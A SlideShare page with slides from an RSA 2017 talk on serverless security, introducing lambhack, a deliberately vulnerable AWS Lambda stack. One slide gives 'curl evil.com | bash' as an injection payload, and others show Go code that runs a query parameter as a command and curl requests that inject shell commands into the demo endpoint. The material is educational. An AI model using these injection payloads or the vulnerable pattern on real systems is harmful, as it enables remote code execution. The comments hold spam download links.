Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
SESSION ID:SESSION ID:
#RSAC
James Wickett
Serverless Security:
Are you ready for the Future?
ASD-F01
Head of Research
Sig...
#RSAC
James Wickett
2
Head of Research at Signal Sciences
Author DevOps Fundamentals at
lynda.com
Author of book on DevOps...
#RSAC
Conclusion
3
Serverless encourages functions as deploy units, coupled
with third party services that allow running e...
#RSAC
Conclusion (2)
4
Four key areas apply to serverless security
Software Supply Chain Security
Delivery Pipeline Securi...
#RSAC
What is Serverless?
#RSAC
Misconceptions
#RSAC
It’s Marketing
(cloud rebranded)
#RSAC
Serverless ==
no servers
#RSAC
Serverless ==
Backend as a Service
#RSAC
serverless == Platform as a
Service
#RSAC
TK: AdrianCO quote
#RSAC
So, what is Serverless?
#RSAC
http://martinfowler.com/articles/serverless.html
#RSAC
@mikebroberts
#RSAC
Serverless was first used to
describe applications that
significantly or fully depend on 3rd
party applications / se...
#RSAC
Serverless can also mean applications
where some amount of server-side logic is
still written by the application dev...
#RSAC
History of Serverless
17
2012 - used to describe BaaS and Continuous Integration
services run by third parties
Late ...
#RSAC
18
Client
Server
Database
Proxy/LB
Server
Server
Old School Arch
#RSAC
Serverless Arch
19
Client
Auth Service API Gateway
Database
Service
Function A
Function B
Web Delivery
#RSAC
20
#RSAC
What can we say is
serverless?
#RSAC
Serverless is Functions As a
Service (FaaS)
#RSAC
Containers on Demand
#RSAC
Serverless is
(no management of)
Servers
#RSAC
Serverless IS SERVICEFULL
#RSAC
Serverless is an opinionated
framework for compute
#RSAC
Serverless encourages
functions as deploy units,
coupled with third party
services that allow running
end-to-end app...
#RSAC
A Short History of Cloud
28
#RSAC
Virtualization
#RSAC
“The Cloud”
#RSAC
DEVOPS
#RSAC
SaaS
PaaS
IaaS
#RSAC
Private Cloud
#RSAC
Then, along came containers
#RSAC
containers are teh hawtness
#RSAC
#RSAC
Lots of effort in Container
Orchestration
#RSAC
The Cloud was to
Virtualization as Serverless
will be to Containers
#RSAC
If you want to lead your company
bravely into the new world, you
would do well to focus lot on
how serverless will e...
#RSAC
Serverless encourages
functions as deploy units,
coupled with third party
services that allow running
end-to-end app...
#RSAC
So, what are the upsides?
#RSAC
Scaling built in
#RSAC
Pay for what you use in
100MS increments
#RSAC
With Serverless system
administration is (mostly)
lower
#RSAC
Serverless is implicit
Microservices
#RSAC
Short Circuits Ops and
moves infrastructure
runtime closer to devs
#RSAC
You can skip Chefing
Dockering all the things!
#RSAC
Lean Startup Friendly
#RSAC
Increased Velocity
#RSAC
Great, what’s the catch?
#RSAC
Ops Burden to rationalize Serverless
model
(specifically Deploy)
#RSAC
Monitoring
#RSAC
Logging
#RSAC
Stateless for Real
with no persistence* across
function runs
#RSAC
Vendor Lock-In
#RSAC
Security
#RSAC
Reliability
#RSAC
#RSAC
Serverless Use cases
#RSAC
Image resizing
#RSAC
Queue processing
61
http://martinfowler.com/articles/serverless.html
#RSAC
Run a web application
#RSAC
API Gateway
63
http://martinfowler.com/articles/serverless.html
#RSAC
CI/CD
#RSAC
Security is the same and
different
#RSAC
What used to be system
calls is now distributed
computing over the network
#RSAC
Serverless shifts attack
surface to third parties
#RSAC
Lets try a sample application
in AWS
#RSAC
Go Sparta
69
Golang!
AWS Lambda supports bring your own binary
Sparta wraps your binary with node.js shim
#RSAC
#RSAC
Other options
71
Serverless Framework
APEX
Kappa
#RSAC
Wordy
72
Analyzes textual occurrences
given a block of text, returns
JSON count of words
Calls API under the hood to...
#RSAC
#RSAC
#RSAC
#RSAC
go run main.go provision -s S3_BUCKET
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
#RSAC
What I learned about
serverless security
#RSAC
#RSAC
Security
#RSAC
Four areas of Serverless Security
89
Secure Software Supply Chain
Delivery Pipeline
Data Flow Security
Attack Detect...
#RSAC
Secure Software Supply
Chain
#RSAC
Surface area Reduction!
#RSAC
Surface area Expansion!
#RSAC
SSL / TLS from the Provider
#RSAC
New Way
Old Way
#RSAC
Routing from the provider
#RSAC
Old Way
New Way
#RSAC
#RSAC
Lambda + s3 + kinesis + DynamoDB
+ cloudformation + API Gateway +
Auth0
#RSAC
Abuse of open IAM privs
99
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
#RSAC
Recommendation:
Use a third-party service to
monitor for provider config
changes
#RSAC
Provider Security
101
Disable root access keys
Manage users with profiles
Secure your keys in your deploy system
Sec...
#RSAC
Delivery Pipeline Security
#RSAC
#RSAC
Unit Testing
#RSAC
Easier to mock
Harder to mock
#RSAC
#RSAC
Integration Testing
#RSAC
Configuration is part of
delivery
#RSAC
#RSAC
Simple Deploy Pipeline Security
110
Only dev keys can push to ‘dev’
Only build/deploy system can push to pre-prod
In...
#RSAC
Security Integration Testing
111
BDD-Security - github.com/continuumsecurity/bdd-
security
Gauntlt - gauntlt.org
#RSAC
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
#RSAC
Data Flow Security
113
Development
Data Flow Diagrams
Threat modeling
Runtime
#RSAC
Your provider is responsible for
the underlying infrastructure and
services. You are responsible for
ensuring you us...
#RSAC
Application layer DoS
#RSAC
Timeouts and Execution
restrictions
#RSAC
Attack Detection
#RSAC
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
#RSAC
AppSec Greatest Hits (XSS,
SQLi, Cmdexe) still relevant
15 years later!
#RSAC
AppSec Problems
120
#RSAC
Types of Attacks
121
XSS, Injection, Deserialization, …
New surface area similar problems
e.g. appending to ‘curl ev...
#RSAC
Defense
122
Logging, emitting events
Vandium (SQLi) wrapper
Content Security Policy (CSP)
More things need to be don...
#RSAC
New Thing Alert!
123
Want to see make the point that appsec is still relevant in
serverless
A vulnerable Lambda + AP...
#RSAC
#RSAC
lambhack
125
A Vulnerable Lambda + API Gateway stack
Open Source, MIT licensed
Released for the first time here at R...
#RSAC
//command := lambdaEvent.PathParams["command"]
command := lambdaEvent.QueryParams["args"]
output := runner.Run(comma...
#RSAC
Let’s take a look at
cmdexe in lambhack
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/
serverless-audit/c?args=uname+-a;+sleep+1"
> Linux ip...
#RSAC
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/
serverless-audit/c?args=cat+/proc/version;+sleep+1"
>...
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/
serverless-audit/c?args=ls+-la+/tmp;+sleep+1"
total
1...
#RSAC
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/
serverless-audit/c?args=ls+/tmp;+sleep+1"
$ curl “htt...
#RSAC
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/
serverless-audit/c?args=which+curl;+sleep+1"
> /usr/b...
#RSAC
XSS, SQLi, … More to come!
#RSAC
email me if you are interested:
james@signalsciences.com
#RSAC
Conclusion
135
Serverless encourages functions as deploy units, coupled
with third party services that allow running...
#RSAC
Conclusion (2)
136
Four key areas apply to serverless security
Software Supply Chain Security
Delivery Pipeline Secu...
#RSAC
#RSAC
Let’s talk!
138
James Wickett
james@signalsciences.com
@wickett
Upcoming SlideShare
Loading in …5
×

Serverless Security: Are you ready for the Future?

24,707 views

Published on

Talk from RSA 2017 on Serverless Security and the 4 areas of growth for security in the world of serverless. In this talk, there is also the first release of lambhack, an open source, vulnerable lambda-based serverless stack demoing arbitrary code execution in lambda.

Published in: Software
  • -- DOWNLOAD THIS BOOKS INTO AVAILABLE FORMAT -- ......................................................................................................................... ......................................................................................................................... Download FULL PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... (Unlimited)
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • If you want to download or read this book, copy link or url below in the New tab ......................................................................................................................... DOWNLOAD FULL PDF EBOOK here { http://bit.ly/2m77EgH } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m77EgH } .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Hello! Get Your Professional Job-Winning Resume Here - Check our website! https://vk.cc/818RFv
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Serverless Security: Are you ready for the Future?

  1. 1. SESSION ID:SESSION ID: #RSAC James Wickett Serverless Security: Are you ready for the Future? ASD-F01 Head of Research Signal Sciences @wickett
  2. 2. #RSAC James Wickett 2 Head of Research at Signal Sciences Author DevOps Fundamentals at lynda.com Author of book on DevOps (email me for a free copy > james@signalsciences.com) Blogger at theagileadmin.com and labs.signalsciences.com
  3. 3. #RSAC Conclusion 3 Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging Security with serverless is easier Security with serverless is harder
  4. 4. #RSAC Conclusion (2) 4 Four key areas apply to serverless security Software Supply Chain Security Delivery Pipeline Security Data Flow Security Attack Detection New! A very vulnerable lambda stack open source project github.com/wickett/lambhack
  5. 5. #RSAC What is Serverless?
  6. 6. #RSAC Misconceptions
  7. 7. #RSAC It’s Marketing (cloud rebranded)
  8. 8. #RSAC Serverless == no servers
  9. 9. #RSAC Serverless == Backend as a Service
  10. 10. #RSAC serverless == Platform as a Service
  11. 11. #RSAC TK: AdrianCO quote
  12. 12. #RSAC So, what is Serverless?
  13. 13. #RSAC http://martinfowler.com/articles/serverless.html
  14. 14. #RSAC @mikebroberts
  15. 15. #RSAC Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services (‘in the cloud’) to manage server-side logic and state. http://martinfowler.com/articles/serverless.html
  16. 16. #RSAC Serverless can also mean applications where some amount of server-side logic is still written by the application developer but unlike traditional architectures is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party. http://martinfowler.com/articles/serverless.html
  17. 17. #RSAC History of Serverless 17 2012 - used to describe BaaS and Continuous Integration services run by third parties Late 2014 - AWS launched Lambda July 2015 - AWS launched API Gateway October 2015 - AWS re:Invent - The Serverless company using AWS Lambda 2015 to present - Frameworks forming 2016 - Serverless Conference http://www.slideshare.net/AmazonWebServices/arc308- the-serverless-company-using-aws-lambda
  18. 18. #RSAC 18 Client Server Database Proxy/LB Server Server Old School Arch
  19. 19. #RSAC Serverless Arch 19 Client Auth Service API Gateway Database Service Function A Function B Web Delivery
  20. 20. #RSAC 20
  21. 21. #RSAC What can we say is serverless?
  22. 22. #RSAC Serverless is Functions As a Service (FaaS)
  23. 23. #RSAC Containers on Demand
  24. 24. #RSAC Serverless is (no management of) Servers
  25. 25. #RSAC Serverless IS SERVICEFULL
  26. 26. #RSAC Serverless is an opinionated framework for compute
  27. 27. #RSAC Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
  28. 28. #RSAC A Short History of Cloud 28
  29. 29. #RSAC Virtualization
  30. 30. #RSAC “The Cloud”
  31. 31. #RSAC DEVOPS
  32. 32. #RSAC SaaS PaaS IaaS
  33. 33. #RSAC Private Cloud
  34. 34. #RSAC Then, along came containers
  35. 35. #RSAC containers are teh hawtness
  36. 36. #RSAC
  37. 37. #RSAC Lots of effort in Container Orchestration
  38. 38. #RSAC The Cloud was to Virtualization as Serverless will be to Containers
  39. 39. #RSAC If you want to lead your company bravely into the new world, you would do well to focus lot on how serverless will evolve. - @Cloudopinion https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
  40. 40. #RSAC Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
  41. 41. #RSAC So, what are the upsides?
  42. 42. #RSAC Scaling built in
  43. 43. #RSAC Pay for what you use in 100MS increments
  44. 44. #RSAC With Serverless system administration is (mostly) lower
  45. 45. #RSAC Serverless is implicit Microservices
  46. 46. #RSAC Short Circuits Ops and moves infrastructure runtime closer to devs
  47. 47. #RSAC You can skip Chefing Dockering all the things!
  48. 48. #RSAC Lean Startup Friendly
  49. 49. #RSAC Increased Velocity
  50. 50. #RSAC Great, what’s the catch?
  51. 51. #RSAC Ops Burden to rationalize Serverless model (specifically Deploy)
  52. 52. #RSAC Monitoring
  53. 53. #RSAC Logging
  54. 54. #RSAC Stateless for Real with no persistence* across function runs
  55. 55. #RSAC Vendor Lock-In
  56. 56. #RSAC Security
  57. 57. #RSAC Reliability
  58. 58. #RSAC
  59. 59. #RSAC Serverless Use cases
  60. 60. #RSAC Image resizing
  61. 61. #RSAC Queue processing 61 http://martinfowler.com/articles/serverless.html
  62. 62. #RSAC Run a web application
  63. 63. #RSAC API Gateway 63 http://martinfowler.com/articles/serverless.html
  64. 64. #RSAC CI/CD
  65. 65. #RSAC Security is the same and different
  66. 66. #RSAC What used to be system calls is now distributed computing over the network
  67. 67. #RSAC Serverless shifts attack surface to third parties
  68. 68. #RSAC Lets try a sample application in AWS
  69. 69. #RSAC Go Sparta 69 Golang! AWS Lambda supports bring your own binary Sparta wraps your binary with node.js shim
  70. 70. #RSAC
  71. 71. #RSAC Other options 71 Serverless Framework APEX Kappa
  72. 72. #RSAC Wordy 72 Analyzes textual occurrences given a block of text, returns JSON count of words Calls API under the hood to get text It is comprised of Lambda, s3, API Gateway
  73. 73. #RSAC
  74. 74. #RSAC
  75. 75. #RSAC
  76. 76. #RSAC go run main.go provision -s S3_BUCKET
  77. 77. #RSAC
  78. 78. #RSAC
  79. 79. #RSAC
  80. 80. #RSAC
  81. 81. #RSAC
  82. 82. #RSAC
  83. 83. #RSAC
  84. 84. #RSAC
  85. 85. #RSAC
  86. 86. #RSAC What I learned about serverless security
  87. 87. #RSAC
  88. 88. #RSAC Security
  89. 89. #RSAC Four areas of Serverless Security 89 Secure Software Supply Chain Delivery Pipeline Data Flow Security Attack Detection
  90. 90. #RSAC Secure Software Supply Chain
  91. 91. #RSAC Surface area Reduction!
  92. 92. #RSAC Surface area Expansion!
  93. 93. #RSAC SSL / TLS from the Provider
  94. 94. #RSAC New Way Old Way
  95. 95. #RSAC Routing from the provider
  96. 96. #RSAC Old Way New Way
  97. 97. #RSAC
  98. 98. #RSAC Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0
  99. 99. #RSAC Abuse of open IAM privs 99 https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
  100. 100. #RSAC Recommendation: Use a third-party service to monitor for provider config changes
  101. 101. #RSAC Provider Security 101 Disable root access keys Manage users with profiles Secure your keys in your deploy system Secure keys in dev system Use provider MFA
  102. 102. #RSAC Delivery Pipeline Security
  103. 103. #RSAC
  104. 104. #RSAC Unit Testing
  105. 105. #RSAC Easier to mock Harder to mock
  106. 106. #RSAC
  107. 107. #RSAC Integration Testing
  108. 108. #RSAC Configuration is part of delivery
  109. 109. #RSAC
  110. 110. #RSAC Simple Deploy Pipeline Security 110 Only dev keys can push to ‘dev’ Only build/deploy system can push to pre-prod Integration tests must pass in this env Security validation must take place Allow push to prod, only by deploy system
  111. 111. #RSAC Security Integration Testing 111 BDD-Security - github.com/continuumsecurity/bdd- security Gauntlt - gauntlt.org
  112. 112. #RSAC http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
  113. 113. #RSAC Data Flow Security 113 Development Data Flow Diagrams Threat modeling Runtime
  114. 114. #RSAC Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner. https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
  115. 115. #RSAC Application layer DoS
  116. 116. #RSAC Timeouts and Execution restrictions
  117. 117. #RSAC Attack Detection
  118. 118. #RSAC https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
  119. 119. #RSAC AppSec Greatest Hits (XSS, SQLi, Cmdexe) still relevant 15 years later!
  120. 120. #RSAC AppSec Problems 120
  121. 121. #RSAC Types of Attacks 121 XSS, Injection, Deserialization, … New surface area similar problems e.g. appending to ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
  122. 122. #RSAC Defense 122 Logging, emitting events Vandium (SQLi) wrapper Content Security Policy (CSP) More things need to be done here…
  123. 123. #RSAC New Thing Alert! 123 Want to see make the point that appsec is still relevant in serverless A vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …) Introducing lambhack
  124. 124. #RSAC
  125. 125. #RSAC lambhack 125 A Vulnerable Lambda + API Gateway stack Open Source, MIT licensed Released for the first time here at RSA Includes arbitrary code execution in a query string More work needed, PRs accepted and looking for community help github.com/wickett/lambhack
  126. 126. #RSAC //command := lambdaEvent.PathParams["command"] command := lambdaEvent.QueryParams["args"] output := runner.Run(command) Vulnerable code is also vulnerable in Serverless
  127. 127. #RSAC Let’s take a look at cmdexe in lambhack
  128. 128. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=uname+-a;+sleep+1" > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux uname -a
  129. 129. #RSAC $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=cat+/proc/version;+sleep+1" > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi- build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) SMP Tue Dec 6 20:30:04 UTC 2016 cat /proc/version
  130. 130. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=ls+-la+/tmp;+sleep+1" total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64 Let’s see /tmp
  131. 131. #RSAC $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=ls+/tmp;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/ pargs=touch+/tmp/wickettfile;+sleep+1" $ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/args=ls+/tmp;+sleep+1" > Sparta.lambda.amd64 wickettfile Lambda Reuse!
  132. 132. #RSAC $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/ serverless-audit/c?args=which+curl;+sleep+1" > /usr/bin/curl Could we upload our own payload?
  133. 133. #RSAC XSS, SQLi, … More to come!
  134. 134. #RSAC email me if you are interested: james@signalsciences.com
  135. 135. #RSAC Conclusion 135 Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation. New serverless patterns are just emerging Security with serverless is easier Security with serverless is harder
  136. 136. #RSAC Conclusion (2) 136 Four key areas apply to serverless security Software Supply Chain Security Delivery Pipeline Security Data Flow Security Attack Detection New! A very vulnerable lambda stack open source project github.com/wickett/lambhack
  137. 137. #RSAC
  138. 138. #RSAC Let’s talk! 138 James Wickett james@signalsciences.com @wickett

×